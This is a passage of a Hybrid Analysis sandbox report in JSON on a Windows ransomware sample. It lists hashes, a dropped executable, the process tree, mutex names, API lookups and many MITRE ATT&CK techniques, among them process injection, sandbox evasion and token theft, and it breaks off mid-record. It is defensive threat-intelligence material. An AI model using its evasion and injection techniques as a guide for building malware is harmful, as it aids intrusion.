"origin": "External System"}]}
10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e
https://hybrid-analysis.com/sample/10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e
Hybrid Analysis - Ransomware
{"size": 606108, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e", "sha256": "10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 166, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606112, "sha256": "70ec829903a6f0a55cc136d23084e5611758874d6288d0e14478af609d327792", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005884", "name": "10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe", "normalized_path": "C:\\10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe", "sha256": "10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e", "av_label": "Trojan.Generic", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00005500", "parentuid": "00000000-00005884", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe *", "sha256": "70ec829903a6f0a55cc136d23084e5611758874d6288d0e14478af609d327792"}, {"uid": "00000000-00004308", "parentuid": "00000000-00005500", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZUUZZG", "sha256": "70ec829903a6f0a55cc136d23084e5611758874d6288d0e14478af609d327792"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ee16a@ADVAPI32.dll\"\n \"0e000f00703fe16a@ADVAPI32.dll\"\n \"0e000f00cc3fe16a@ADVAPI32.dll\"\n \"11001200b447e16a@ADVAPI32.dll\"\n \"110012004848e16a@ADVAPI32.dll\"\n \"120013008c48e16a@ADVAPI32.dll\"\n \"12001300e448e16a@ADVAPI32.dll\"\n \"14001500386ee16a@ADVAPI32.dll\"\n \"14001500506ee16a@ADVAPI32.dll\"\n \"14001500686ee16a@ADVAPI32.dll\"\n \"17001800806ee16a@ADVAPI32.dll\"\n \"0d000e00986ee16a@ADVAPI32.dll\"\n \"11001200a86ee16a@ADVAPI32.dll\"\n \"11001200bc6ee16a@ADVAPI32.dll\"\n \"0d000e004466e16a@WININET.dll\"\n \"0d000e00b466e16a@WININET.dll\"\n \"10001100ec66e16a@WININET.dll\"\n \"100011009067e16a@WININET.dll\"\n \"10001100006fe16a@WININET.dll\"\n \"10001100146fe16a@WININET.dll\"\n \"14001500286fe16a@WININET.dll\"\n \"14001500406fe16a@WININET.dll\"\n \"12001300586fe16a@WININET.dll\"\n \"120013006c6fe16a@WININET.dll\"\n \"10001100d067e16a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter 